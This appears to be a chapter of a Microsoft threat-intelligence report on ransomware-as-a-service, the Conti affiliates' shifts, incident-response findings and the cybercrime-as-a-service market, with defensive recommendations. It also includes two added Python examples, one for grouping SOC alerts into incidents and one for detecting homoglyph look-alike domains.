As cyber defences improve and more governments and businesses take a proactive approach to prevention, we see attackers using two strategies to gain the access required to facilitate cybercrime. One approach is a campaign with broad targets that relies on volume. The other uses surveillance and more selective targeting to increase the rate of return. Even when revenue generation is not the objective – such as nation state activity for geopolitical purposes – both random and targeted attacks are used.
This past year, cybercriminals continued to rely on social engineering and exploitation of topical issues to maximise the success of campaigns. For example, while COVID-themed phishing lures were used less frequently, we observed lures soliciting donations to support the citizens of Ukraine increasing.
Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. We have observed cybercriminals becoming more frugal, and attackers are no longer paying for technology. To lower their overhead and boost the appearance of legitimacy, some attackers increasingly seek to compromise businesses to host phishing campaigns, malware or even use their computing power to mine cryptocurrency.
In this chapter, we also examine the rise in hacktivism, a disruption caused by private citizens conducting cyberattacks to further social or political goals. Thousands of individuals around the world, both experts and novices, have mobilised since February 2022 to launch attacks such as disabling websites and leaking stolen data as part of the Russia-Ukraine war. It is too soon to predict whether this trend will continue after the end of active hostilities.
Organisations must regularly review and strengthen access controls and implement security strategies to defend against cyberattacks. However, that is not all they can do. We explain how our Digital Crimes Unit (DCU) has used civil cases to seize malicious infrastructure used by cybercriminals and nation state actors. We must fight this threat together through both public and private partnerships. We hope that by sharing what we have learned over the past 10 years, we will help others understand and consider the proactive measures they can take to protect themselves and the wider ecosystem against the continually growing threat of cybercrime.
Amy Hogan-Burney, General Manager, Digital Crimes Unit
08
  • 10. Ransomware and extortion: A nation-level threat
Ransomware attacks pose an increased danger to all individuals as critical infrastructure, businesses of all sizes and state and local governments are targeted by criminals leveraging a growing cybercriminal ecosystem.
Over the past two years, high profile ransomware incidents – such as those involving critical infrastructure, healthcare and IT service providers – have drawn considerable public attention. As ransomware attacks have become more audacious in scope, their effects have become more wide ranging. The following are examples of attacks we’ve seen already in 2022:
• In February, an attack on two companies affected the payment processing systems of hundreds of petrol stations in northern Germany.[1]
• In March, an attack against Greece’s postal service temporarily disrupted mail delivery and impacted the processing of financial transactions.[2]
• In late May, a ransomware attack against Costa Rican government agencies forced a national emergency to be declared after hospitals were shut down and customs and tax collection disrupted.[3]
• Also in May, an attack caused flight delays and cancellations for one of India’s largest airlines, leaving hundreds of passengers stranded.[4]
The success of these attacks and the extent of their real-world impacts are the result of an industrialisation of the cybercrime economy, enabling access to tooling and infrastructure and expanding cybercriminal capabilities by lowering their skill barrier to entry. In recent years, ransomware has moved from a model where a single ‘gang’ would both develop and distribute a ransomware payload to the Ransomware-as-a-Service (RaaS) model. RaaS allows one group to manage the development of the ransomware payload and provide services for payment and extortion via data leakage to other cybercriminals – the ones who actually launch the ransomware attacks – referred to as ‘affiliates’ for a cut of the profits. This franchising of the cybercrime economy has expanded the attacker pool. The industrialisation of cybercriminal tooling has made it easier for attackers to perform intrusions, exfiltrate data and deploy ransomware.
Human operated ransomware[5] – a term coined by Microsoft researchers to describe threats driven by humans who make decisions at every stage of the attacks based on what they discover in their target’s network, and to delineate the threat from commodity ransomware attacks – remains a significant threat to organisations.
Human operated ransomware targeting and rate of success model (see p15)
2,500 potential target organisations
60 encounter activity associated with known ransomware attackers
20 are successfully compromised
1 falls victim to a successful ransomware event
Factors: Low barrier to entry. Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack. RaaS affiliates prioritise targets by intended impact or perceived profit. Attackers take advantage of any security weakness they find in the network, so attacks vary. The ransomware payload is the culmination of a chain of malicious activity.
Model based on Microsoft Defender for Endpoint (EDR) data (January-June 2022).
09
  • 11. Ransomware and extortion: A nation-level threat (continued)
Our unique breadth of signal intelligence is gathered from multiple sources – identity, email, endpoints and cloud – and provides insight into the growing ransomware economy, complete with an affiliate system which includes tools designed for less technically-abled attackers.
Digital threat activity is at an all-time high and the level of sophistication increases every day.
Expanding relationships between specialised cybercriminals have increased the pace, sophistication and success of ransomware attacks. This has driven the evolution of the cybercriminal ecosystem into connected players with different techniques, goals and skillsets that support each other on initial access to targets, payment services and decryption or publication tools or sites.
Ransomware attacks have become even more impactful as the adoption of a double extortion monetisation strategy has become a standard practice. This involves exfiltrating data from compromised devices, encrypting the data on the devices and then posting or threatening to post the stolen data publicly to pressure victims into paying a ransom. Although most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, some purchase access from other cybercriminals, leveraging connections between access brokers and ransomware operators.
Ransomware operators can now purchase access to organisations or government networks online or obtain credentials and access via interpersonal relationships with brokers whose main objective is solely to monetise the access they have gained. The operators then use the purchased access to deploy a ransomware payload bought via dark web marketplaces or forums. In many cases, negotiations with victims are conducted by the RaaS team, not the operators themselves.
These criminal transactions are seamless and the participants risk little chance of being arrested and charged due to the anonymity of the dark web and difficulty enforcing laws transnationally. A sustainable and successful effort against this threat will require a whole-of-government strategy to be executed in close partnership with the private sector.
10
  • 12. Contrary to how ransomware is sometimes portrayed in the media, it is rare for a single ransomware variant to be managed by one end-to-end ‘ransomware gang’. Instead, there are separate entities that build malware, gain access to victims, deploy ransomware and handle extortion negotiations. The industrialisation of the criminal ecosystem has led to:
• Access brokers that break in and hand off access (Access-as-a-Service).
• Malware developers that sell tooling.
• Criminal operators and affiliates that conduct intrusions.
• Encryption and extortion service providers that take over monetisation from affiliates (RaaS).
All human-operated ransomware campaigns share common dependencies on security weaknesses. Specifically, attackers usually take advantage of an organisation’s poor cyber hygiene, which often includes infrequent patching and failure to implement multifactor authentication (MFA).
Understanding the ransomware economy
Operators: A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure and cryptocurrency transaction services. Named RaaS programs: Conti, HIVE, Black Matter, LockBit, REvil, BlackCat.
Affiliates: Affiliates are generally small groups of people ‘affiliated’ with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration.
Access brokers: Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialise in high-value network access, while lower tier brokers on the dark web might have just one-to-two usable stolen credentials for sale. Organisations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen.
11
  • 13. Case study: The dissolution of Conti
Conti, one of the top ransomware variants over the past two years, began shutting down operations in mid-2022, with the Microsoft Threat Intelligence Centre (MSTIC) observing a significant decrease in activity in late March and early April. We observed the last Conti ransomware deployments in mid-April. However, much like the shuttering of other ransomware operations, Conti’s dissolution did not have a significant impact on ransomware deployments, as MSTIC observed Conti affiliates pivoting to deploy other ransomware payloads, including BlackBasta, Lockbit 2.0, LockbitBlack and HIVE. This is consistent with data from previous years and suggests that when ransomware gangs go offline, they re-emerge months later or redistribute their technical capabilities and resources to new groups.
Our Microsoft threat intelligence teams track ransomware threat actors as individual groups (labelled as DEVs) based on their specific tools, rather than tracking them by the malware they use. This meant that when Conti’s affiliates dispersed, we were able to continue tracking these DEVs through their use of other tools or RaaS kits. For example:
• DEV-0230, which is affiliated with Trickbot, had been a prolific user of Conti. In late April, MSTIC observed it using QuantumLocker.
• DEV-0237 shifted from Conti’s ransomware kit to HIVE and Nokoyawa, including using HIVE in the May 31 attack against Costa Rican government agencies.
• DEV-0506, another prolific user of the Conti ransomware kit, was observed using BlackBasta.
Example of an affiliate (DEV-0237) quickly shifting between RaaS programs: after a RaaS program such as Conti is shut down, the ransomware affiliate shifts to another one (Hive) almost immediately.
Timeline: Ryuk, Jan 2020-Jun 2021; Conti, Jul-Oct 2021; Hive, Oct 2021-present; BlackCat, Mar 2022-present; Nokoyawa, May 2022-present; Agenda etc., June 2022 (experimenting).
RaaS evolves the ransomware ecosystem and hinders attribution
Because human-operated ransomware is driven by individual operators, attack patterns vary based on the target and alternate throughout the duration of an attack. In the past, we observed a close relationship between the initial entry vector, tools and ransomware payload choices in each campaign of a single ransomware strain. This made attribution easier. The RaaS affiliate model, however, decouples this relationship. As a result, Microsoft tracks ransomware affiliates deploying payloads in specific attacks, rather than tracking the ransomware payload developers as operators. Put another way, we no longer assume the HIVE developer is the operator behind a HIVE ransomware attack; it is more likely to be an affiliate.
The cybersecurity industry has struggled to adequately capture this delineation between developers and operators. The industry still often reports a ransomware incident by its payload name, giving the false impression that a single entity, or ransomware gang, is behind all attacks using that particular ransomware payload, and that all incidents associated with it share common techniques and infrastructure.
To support network defenders, it is important to learn more about the stages that precede different affiliates’ attacks – such as data exfiltration and additional persistence mechanisms – and the detection and protection opportunities that might exist. More so than malware, attackers need credentials to succeed in their operations. The successful human operated ransomware infection of an entire organisation relies on access to a highly privileged account.
Spotlight on human-operated ransomware attacks

Over the past year, Microsoft’s ransomware experts conducted deep investigations into more than 100 human-operated ransomware incidents to track attackers’ techniques and understand how to better protect our customers. It is important to note that the analysis we share here is possible only for onboarded, managed devices. Non-onboarded, unmanaged devices represent the least secure part of an organisation’s hardware assets.

A durable security strategy

Combating and preventing attacks of this nature requires a shift in an organisation’s mindset to focus on the comprehensive protection required to slow and stop attackers before they can move from the pre-ransomware phase to the ransomware deployment phase. Enterprises must apply security best practices consistently and aggressively to their networks, with the goal of mitigating classes of attacks.

Because of the human decision making involved, these ransomware attacks can generate multiple, seemingly disparate security product alerts which can easily get lost or not responded to in time. Alert fatigue is real, and security operations centres (SOCs) can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can not only reduce alert volume, but also stop many attackers before they get access to networks. Organisations must maintain continuous high standards of security posture and network hygiene to protect themselves from human-operated ransomware attacks.

The typical human-operated attack

Human-operated ransomware attacks can be categorised into the pre-ransomware phase and the ransomware deployment phase. During the pre-ransomware phase, attackers prepare to infiltrate the network by learning about the organisation’s topology and security infrastructure.

[Figure: Stop the attackers before they reach the ransomware deployment phase. Pre-ransomware phase: attackers prepare to infiltrate the network by learning as much as possible about the topology and security infrastructure, and may also exfiltrate data; this phase can range from a few days to several weeks or months, although it has been shortening over the past two years. Ransomware deployment phase: attackers aim to encrypt as much data as possible; this phase can last only minutes.]

Our investigations found most actors behind human-operated ransomware attacks take advantage of similar security weaknesses and share common attack patterns and techniques. The most prevalent ransomware phase techniques:

75% use admin tools.
75% use an acquired, elevated, compromised user account to spread malicious payloads through the SMB protocol.
99% attempt to tamper with discovered security and backup products using OS-built tools.

Actionable insights

Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.

1. Build credential hygiene. More so than malware, attackers need credentials to succeed in their operations. The successful human-operated ransomware infection of an entire organisation relies on access to a highly privileged account like a Domain Administrator, or the ability to edit a Group Policy.
2. Audit credential exposure.
3. Prioritise deployment of Active Directory updates.
4. Prioritise cloud hardening.
5. Reduce the attack surface.
6. Harden internet-facing assets and understand your perimeter.
7. Reduce SOC alert fatigue by hardening your network to reduce volume and preserve bandwidth for high priority incidents.
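Grouping seemingly disparate alerts into incidents, as recommended above for SOCs, can be shown in code. The following Python is an added example written for this page, not Microsoft’s or any product’s code; the alert line format, the three category names (modelled on the prevalent techniques listed above), the 24-hour correlation window and the sample alert lines are all constructed assumptions.

```python
"""Group related security alerts into incidents and rank them by pre-ransomware
signals, so a SOC sees the attack chain instead of isolated alerts."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Alert categories standing in for the three prevalent pre-deployment techniques
# (admin tool use, SMB lateral movement, security/backup tool tampering).
# The category names are an assumption of this example, not a product schema.
PRE_RANSOMWARE_STAGES = {"AdminToolUse", "SmbLateralMovement", "SecurityToolTamper"}

# Constructed sample alerts, not real telemetry.
# Format: timestamp | device | account | category | detail
SAMPLE_ALERTS = """\
2022-03-01T09:02:00 | WS-FIN-07 | jdoe | AdminToolUse | remote admin tool launched interactively
2022-03-01T09:40:00 | WS-FIN-07 | svc-backup | SmbLateralMovement | payload written to admin share on SRV-FILE-01
2022-03-01T09:41:00 | SRV-FILE-01 | svc-backup | SmbLateralMovement | remote service created from admin share
2022-03-01T10:05:00 | SRV-FILE-01 | svc-backup | SecurityToolTamper | backup agent service stopped with OS tooling
2022-03-01T10:06:00 | SRV-FILE-01 | svc-backup | SecurityToolTamper | AV exclusion added with OS tooling
2022-03-01T11:30:00 | WS-HR-02 | asmith | SuspiciousAttachment | user opened quarantined attachment
2022-03-03T14:00:00 | WS-DEV-11 | bwong | AdminToolUse | remote admin tool launched interactively
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    device: str
    account: str
    category: str
    detail: str


@dataclass
class Incident:
    alerts: list[Alert]  # time-ordered

    @property
    def devices(self) -> set[str]:
        return {a.device for a in self.alerts}

    @property
    def stages(self) -> set[str]:
        """Which of the three pre-ransomware stages this incident has reached."""
        return {a.category for a in self.alerts} & PRE_RANSOMWARE_STAGES

    @property
    def priority(self) -> str:
        if self.stages == PRE_RANSOMWARE_STAGES:
            return "high"    # full pre-ransomware chain observed: deployment may be minutes away
        if self.stages and len(self.devices) > 1:
            return "medium"  # partial chain that already spans more than one host
        return "low"

    @property
    def started(self) -> datetime:
        return self.alerts[0].ts


def parse_alerts(text: str) -> list[Alert]:
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, device, account, category, detail = [p.strip() for p in line.split("|", 4)]
        alerts.append(Alert(datetime.fromisoformat(ts), device, account, category, detail))
    return sorted(alerts, key=lambda a: a.ts)


def group_alerts(alerts: list[Alert], window: timedelta = timedelta(hours=24)) -> list[Incident]:
    """Union-find over alerts: two alerts belong to the same incident when they
    share a device or an account and occur within the correlation window.
    Links are transitive, so a chain hopping across hosts stays one incident."""
    parent = list(range(len(alerts)))

    def find(i: int) -> int:
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, a in enumerate(alerts):
        for j in range(i + 1, len(alerts)):
            b = alerts[j]
            if b.ts - a.ts > window:
                break  # alerts are time-sorted, so later ones are further away
            if a.device == b.device or a.account == b.account:
                parent[find(j)] = find(i)

    groups: dict[int, list[Alert]] = {}
    for i, a in enumerate(alerts):
        groups.setdefault(find(i), []).append(a)
    return [Incident(g) for g in groups.values()]


def triage(text: str) -> list[Incident]:
    """Parse, group and order incidents: highest priority first, then earliest."""
    rank = {"high": 0, "medium": 1, "low": 2}
    incidents = group_alerts(parse_alerts(text))
    return sorted(incidents, key=lambda inc: (rank[inc.priority], inc.started))


if __name__ == "__main__":
    for inc in triage(SAMPLE_ALERTS):
        print(f"[{inc.priority:>6}] {len(inc.alerts)} alerts, devices={sorted(inc.devices)}, "
              f"stages={sorted(inc.stages)}")
```

On the sample data the five alerts on WS-FIN-07 and SRV-FILE-01 collapse into one high-priority incident, while the two unrelated alerts stay separate low-priority items.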
Links to further information
RaaS: Understanding the cybercrime gig economy and how to protect yourself | Microsoft Security Blog
Human-operated ransomware attacks: A preventable disaster | Microsoft Security Blog
Ransomware insights from front-line responders

Organisations worldwide experienced a steady growth in human-operated ransomware attacks beginning in 2019. However, law enforcement operations and geopolitical events in the last year had a significant impact on cybercriminal organisations.

Microsoft’s Security Service Line supports customers through an entire cyberattack, from investigation to successful containment and recovery activities. The response and recovery services are offered via two highly integrated teams, with one focusing on the investigation and groundwork for recovery and the second one on containment and recovery. This section presents a summary of findings based on ransomware engagements over the past year.

Ransomware incident and recovery engagements by industry:
Manufacturing 28%
IT 4%
Finance 8%
Government 8%
Health 20%
Energy 8%
Education 8%
Consumer retail 16%

As new small groups and threats emerge, defending teams must be aware of evolving ransomware threats while protecting against previously unknown ransomware malware families. The rapid development approach used by criminal groups led to the creation of intelligent ransomware packaged in easy-to-use kits. This allows greater flexibility in launching widespread attacks on a higher number of targets.

The following pages provide a deeper look at the most commonly observed contributing factors to weak protection against ransomware, grouped into three categories of findings:
1. Weak identity controls
2. Ineffective security operations
3. Limited data protection

93% of Microsoft investigations during ransomware recovery engagements revealed insufficient privilege access and lateral movement controls.
Summary of most common findings in ransomware response engagements:
Low maturity security operations 62%
Insufficient application security practices 74%
Limited adoption of modern security frameworks 87%
Insufficient privilege access and lateral movement controls 93%
Insecure configuration of identity provider 86%
No multifactor authentication 74%
Lack of information protection control 65%

The most common finding among ransomware incident response engagements was insufficient privilege access and lateral movement controls.
Ransomware insights from front-line responders (continued)

The three main contributing factors seen in our on-site response engagements:
1. Weak identity controls: Credential theft attacks remain one of the top contributing factors.
2. Ineffective security operations processes do not just present a window of opportunity for attackers, but significantly impact the time to recover.
3. Eventually it boils down to data – organisations struggle to implement an effective data protection strategy which aligns with their business needs.

1 Weak identity controls

Human-operated ransomware continues to evolve and employ credential theft and lateral movement methods traditionally associated with targeted attacks. Successful attacks are often the result of long-running campaigns involving compromise of identity systems, like Active Directory (AD), that allow human operators to steal credentials, access systems and remain persistent in the network.

Active Directory (AD) and Azure AD security: 88% of impacted customers did not employ AD and Azure AD security best practices. This has become a common attack vector as attackers exploit misconfigurations and weaker security postures in critical identity systems to gain broader access and impact to businesses.

Least privilege access and use of Privileged Access Workstations (PAW): None of the impacted organisations implemented proper administrative credential segregation and least privilege access principles via dedicated workstations during the management of their critical identity and high-value assets, such as proprietary systems and business-critical applications.

Privileged account security: In 88% of engagements, MFA was not implemented for sensitive and high privileged accounts, leaving a security gap for attackers to compromise credentials and pivot further attacks using legitimate credentials. Administrators across 84% of organisations did not use privileged identity controls such as just-in-time access to prevent further nefarious use of compromised privileged credentials.
Ransomware insights from front-line responders (continued)

2 Ineffective security operations

Our data shows organisations which suffered ransomware attacks have significant gaps in their security operations, tooling and information technology asset lifecycle management. Based on the available data, the following gaps were most observed:

Patching: 68% of impacted organisations did not have an effective vulnerability and patch management process, and a high dependence on manual processes versus automated patching led to critical openings. Manufacturing and critical infrastructure continue to struggle with maintenance and patching of legacy operational technology (OT) systems.

Lack of security operations tooling: Most organisations reported a lack of end-to-end security visibility due to a lack or misconfiguration of security tools, leading to a decrease in detection and response effectiveness. 60% of organisations reported no use of an EDR6 tool, a fundamental technology for detection and response. 60% did not invest in security information and event management (SIEM) technology, leading to monitoring silos, limited ability to detect end-to-end threats and inefficient security operations. Automation remains a key gap in SOC tooling and processes, forcing SOC staff to spend countless hours making sense of security telemetry. 84% of impacted organisations did not enable integration of their multi-cloud environments into their security operations tooling.

Response and recovery processes: Lack of an effective response plan was a critical area observed in 76% of impacted organisations, preventing proper organisational crisis readiness and negatively impacting time to respond and recover.

3 Limited data protection

Many compromised organisations lacked proper data protection processes, leading to a severe impact on recovery times and the capability to return to business operations. The most common gaps encountered include:

Immutable backup: 44% of organisations did not have immutable backups for the impacted systems. Data also shows administrators did not have backups and recovery plans for critical assets such as AD.

Data loss prevention: Attackers usually find their way to compromise systems via exploiting vulnerabilities in the organisation, exfiltrating critical data for extortion, intellectual property theft or monetisation. 92% of impacted organisations did not implement effective data loss prevention controls to mitigate these risks, leading to critical data loss.
Ransomware declined in some regions and increased in others

This year we observed a drop in the overall number of ransomware cases reported to our response teams in North America and Europe compared to the previous year. At the same time, cases reported in Latin America increased. One interpretation of this observation is cybercriminals pivoted away from areas perceived to have a higher risk of triggering law enforcement scrutiny in favour of softer targets. Since Microsoft did not observe a substantial improvement in enterprise network security worldwide to explain the decrease in ransomware-related support calls, we believe the most likely cause is a combination of law enforcement activity in 2021 and 2022 which increased the cost of criminal activity, along with some geopolitical events of 2022.

One of the most prevalent RaaS operations belongs to a Russian-speaking criminal group known as REvil (also known as Sodinokibi) that has been active since 2019. In October 2021, REvil’s servers were taken offline as part of the international law enforcement Operation GoldDust.7 In January 2022, Russia arrested 14 alleged REvil members and raided 25 locations associated with them.8 This was the first time Russia acted against ransomware operators on its soil.

While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. Moreover, tension between Russia and the United States over Russia’s invasion of Ukraine appears to have put an end to Russia’s nascent cooperation in the global fight against ransomware. After a brief period of uncertainty following the REvil arrests, the United States and Russia ceased cooperation in pursuing ransomware actors, which means cybercriminals might view Russia as a safe haven once more.

Looking ahead, we predict the pace of ransomware activities will depend on the outcome of some key questions:
1. Will governments take action to prevent ransomware criminals from operating within their borders, or seek to disrupt actors operating from foreign soil?
2. Will ransomware groups change tactics to remove the need for ransomware and resort to extortion style attacks?
3. Will organisations be able to modernise and transform their IT operations faster than criminals can exploit vulnerabilities?
4. Will advancements in tracking and tracing ransom payments force ransom recipients to change tactics and negotiations?

2× Ransomware attacks decreased in some regions, but ransom demands more than doubled.

Actionable insights
1. Focus on holistic security strategies, as all of the ransomware families take advantage of the same security weaknesses to impact a network.
2. Update and maintain security basics to increase the defence-in-depth base level of protection and modernise security operations. Moving to the cloud allows you to detect threats more quickly and respond faster.

Links to further information
Protect your organisation from ransomware | Microsoft Security
Seven ways to harden your environment against compromise | Microsoft Security Blog
Improving AI-based defences to disrupt human-operated ransomware | Microsoft 365 Defender Research Team
Security Insider: Explore the latest cybersecurity insights and updates | Microsoft Security
Cybercrime-as-a-Service

Cybercrime-as-a-Service (CaaS) is a growing and evolving threat to customers worldwide. The Microsoft Digital Crimes Unit (DCU) observed continued growth of the CaaS ecosystem with an increasing number of online services facilitating various cybercrimes, including BEC and human-operated ransomware. Phishing continues to be a preferred attack method as cybercriminals can acquire significant value from successfully stealing and selling access to stolen accounts. In response to the expanding CaaS market, DCU enhanced its listening systems to detect and identify CaaS offerings across the entire ecosystem of internet, deep web, vetted forums,9 dedicated websites, online discussion forums and messaging platforms.

2,750,000 site registrations successfully blocked by DCU this year to get ahead of criminal actors that planned to use them to engage in global cybercrime.

DCU investigations into CaaS surfaced a number of key trends:

The number and sophistication of services is increasing. One example is the evolution of web shells, which typically consist of compromised web servers used to automate phishing attacks. DCU observed CaaS resellers simplifying the upload of phishing kits or malware through specialised web dashboards. CaaS sellers often subsequently attempt to sell additional services to the threat actor through the dashboard, such as spam message services and specialised spam recipient lists based on defined attributes including geographic location or profession. In some instances, we observed a single web shell being used in multiple attack campaigns, which suggests threat actors might maintain persistent access to the compromised server.

We also observed an increase in anonymisation services available as part of the CaaS ecosystem, as well as offers for virtual private network (VPN) and virtual private server (VPS) accounts. In most instances, the VPN/VPS offered were initially procured through stolen credit cards. CaaS websites also offered a larger number of remote desktop protocol (RDP), secure shell (SSH) and cPanels for use as a platform to orchestrate cybercrime attacks. CaaS merchants configure the RDP, SSH and cPanels with appropriate tools and scripts to facilitate various types of cyberattacks.

Homoglyph domain creation services are increasingly requiring payment in cryptocurrencies. Homoglyph domains impersonate legitimate domain names by utilising characters that are identical or nearly identical in appearance to another character. The aim is to deceive the viewer into thinking the homoglyph domain is the genuine domain. These domains are a ubiquitous threat and a gateway for a significant amount of cybercrime. CaaS sites now sell custom homoglyph domain names, which allows buyers to request specific company and domain names to impersonate. After payment is received, the CaaS merchants use a homoglyph generator tool to select the domain name and then register the malicious homoglyph. Payment for this service is almost exclusively in cryptocurrency.

Cybercriminals are now collaborating across time zones and languages to deliver specific results. For example, one CaaS website administered by an individual in Asia maintains operations in Europe, and creates malicious accounts in Africa. The multi-jurisdictional nature of these operations presents complex law enforcement challenges. In response, DCU focuses its efforts on disabling malicious criminal infrastructure used to facilitate CaaS attacks and collaborating with law enforcement agencies around the world to hold criminals accountable.

Cybercriminals are increasingly using analytics to maximise reach, scope and gain. Like legitimate businesses, CaaS websites must ensure the validity of products and services to maintain a solid reputation. For example, CaaS websites routinely automate access to compromised accounts to ensure the validity of compromised credentials. Cybercriminals will discontinue sales of specific accounts when passwords are reset or vulnerabilities patched. Increasingly, we identified CaaS websites providing buyers with on-demand verification as a quality control process. As a result, buyers can feel confident the CaaS website sells active accounts and passwords, while reducing potential costs to the CaaS merchant if the stolen credentials are remediated prior to sale.

DCU also observed CaaS websites offering buyers the option to purchase compromised accounts from specific geographic locations, designated online service providers and specifically targeted individuals, professions and industries. Frequently ordered accounts focus on professionals or departments that process invoicing, such as CFOs or ‘Accounts Receivable’. Similarly, industries participating in public contracting are often targeted due to the quantity of information that is made available through the public bidding process.

Cybercrime-as-a-Service (continued)

CaaS sellers increasingly offer compromised credentials for purchase. Compromised credentials enable unauthorised access to user accounts including email messaging service, corporate file sharing resources and OneDrive for Business. If administrator credentials are compromised, unauthorised users could gain access to confidential files, Azure resources and company user accounts. In many instances, DCU investigations identified unauthorised use of the same credential across multiple servers as a means to automate verifying credentials. This pattern suggests the compromised user might be a victim of multiple phishing attacks or have device malware allowing botnet keyloggers to collect credentials.

CaaS services and products with enhanced features are emerging to avoid detection. One CaaS seller offers phishing kits with increased layers of complexity and anonymisation features designed to circumvent detection and prevention systems for as little as USD 6 per day. The service offers a series of redirects that perform checks before allowing traffic to the next layer or site. One of these runs over 90 checks for fingerprinting the device, including whether it is a virtual machine, gathering details about the browser and hardware being used, and more. If all checks pass, traffic is sent to a landing page used for phishing.

End-to-end cybercrime services are selling subscriptions to managed services. Typically, each step in the commission of an online crime can expose threat actors if operational security is poor. The risk of exposure and identification increases if services are purchased from multiple CaaS sites. DCU observed a concerning trend in the dark web whereby there is an increase in services offering to anonymise software code and genericise website text to reduce exposure. End-to-end cybercrime subscription service providers manage all services and guarantee results, which further reduces exposure risks to the subscribing OCN. The reduced risk has increased the popularity of these end-to-end services.

Phishing-as-a-Service (PhaaS) is one example of an end-to-end cybercrime service. PhaaS is an evolution of prior services known as fully undetectable services (FUD) and is offered on a subscription basis. Typical PhaaS terms include keeping phishing websites active for a month. With PhaaS, cybercriminals offer multiple services within a single subscription. In general, a purchaser needs to take only three actions:
1. Select a phishing site template/design from among the hundreds offered.
2. Provide an email address to receive credentials obtained from phishing victims.
3. Pay the PhaaS merchant in cryptocurrency.

Once these steps are completed, the PhaaS merchant creates services with three or four layers of redirect and hosting resources to target specific users. The campaign is subsequently launched, and victim credentials are harvested, verified and sent to the email address provided by the purchaser. For a premium, many PhaaS merchants offer to host phishing sites on the public blockchain so they can be accessed by any browser and redirects can point users to a resource on the distributed ledger.

DCU also identified a CaaS merchant offering distributed denial of service (DDoS) on a subscription model. This model outsources the creation and maintenance of the botnet necessary to carry out attacks to the CaaS merchant. Each DDoS subscription customer receives an encrypted service to enhance operational security and one year of 24/7 support. The DDoS subscription service offers different architectures and attack methods, so a purchaser simply selects a resource to attack and the seller provides access to an array of compromised devices on their botnet to conduct the attack. The cost for the DDoS subscription is a mere USD 500.

DCU’s work to develop tools and techniques which identify and disrupt CaaS cybercriminals is ongoing. The evolution of CaaS services presents significant challenges, particularly in disrupting cryptocurrency payments.
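The homoglyph domains sold as a CaaS offering can be checked for on the defender’s side, for example when reviewing newly registered domains or sender domains in mail logs. The following Python is an added example written for this page, not DCU’s or Microsoft’s tooling; the protected-domain list, the confusables subset and the candidate domains are constructed assumptions. It goes a step beyond the page’s description by also decoding punycode (xn--) forms and reporting the scripts mixed within a label.

```python
"""Flag domains that impersonate protected names with look-alike characters."""
from __future__ import annotations

import unicodedata

# Constructed list of domains to defend (an assumption of this example).
PROTECTED_DOMAINS = ["microsoft.com", "example.com"]

# Constructed subset of look-alike characters mapped onto the ASCII letter they
# resemble. The full Unicode confusables table is far larger; this covers the
# substitutions a homoglyph generator tool is most likely to make.
CONFUSABLES = {
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x",  # Cyrillic
    "у": "y", "і": "i", "ѕ": "s", "ј": "j",                        # Cyrillic
    "ο": "o", "α": "a", "ν": "v", "ρ": "p", "τ": "t",              # Greek
    "ı": "i", "ɡ": "g",                                            # Latin variants
    "0": "o", "1": "l", "3": "e", "5": "s",                         # digits
}
# Letter pairs that read as a single letter at a glance.
MULTI_CONFUSABLES = {"rn": "m", "vv": "w", "cl": "d"}


def skeleton(label: str) -> str:
    """Reduce a name to its visual skeleton so look-alikes compare equal."""
    text = unicodedata.normalize("NFKD", label)  # split accents off base letters
    text = "".join(ch for ch in text if not unicodedata.combining(ch))
    text = text.lower()
    text = "".join(CONFUSABLES.get(ch, ch) for ch in text)
    for seq, replacement in MULTI_CONFUSABLES.items():
        text = text.replace(seq, replacement)
    return text


def scripts_used(label: str) -> set[str]:
    """Scripts of the alphabetic characters in a label (LATIN, CYRILLIC, ...).
    A brand name that mixes scripts is itself a strong impersonation signal."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def to_unicode(domain: str) -> str:
    """Decode punycode (xn--) labels so the look-alike characters become visible."""
    if "xn--" not in domain.lower():
        return domain
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain  # malformed ACE form: fall back to comparing it as-is


def check_domain(candidate: str, protected: list[str] = PROTECTED_DOMAINS) -> tuple[str, str | None]:
    """Return ("legitimate" | "homoglyph" | "clean", matched protected domain)."""
    uni = to_unicode(candidate.strip().rstrip(".")).lower()
    cand_skel = skeleton(uni)
    for target in protected:
        target = target.lower()
        if uni == target or uni.endswith("." + target):
            return ("legitimate", target)  # the real domain or one of its subdomains
        t_skel = skeleton(target)
        if cand_skel == t_skel or cand_skel.endswith("." + t_skel):
            return ("homoglyph", target)   # looks like the target but is not it
    return ("clean", None)


if __name__ == "__main__":
    # Constructed candidates, including a punycode form built from a Cyrillic 'о'.
    samples = [
        "microsoft.com", "rnicrosoft.com", "micr\u043esoft.com",
        "micr\u043esoft.com".encode("idna").decode("ascii"),
        "login.ex\u0430mple.com", "github.com",
    ]
    for dom in samples:
        verdict, target = check_domain(dom)
        scripts = sorted(scripts_used(to_unicode(dom)))
        print(f"{dom:32} {verdict:10} {target or '-':14} scripts={scripts}")
```

The skeleton comparison deliberately treats the protected list and the candidate the same way, so a miss on one side (a substitution not in the table) shows up as a "clean" verdict rather than a false match; extend CONFUSABLES as new substitutions are observed.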
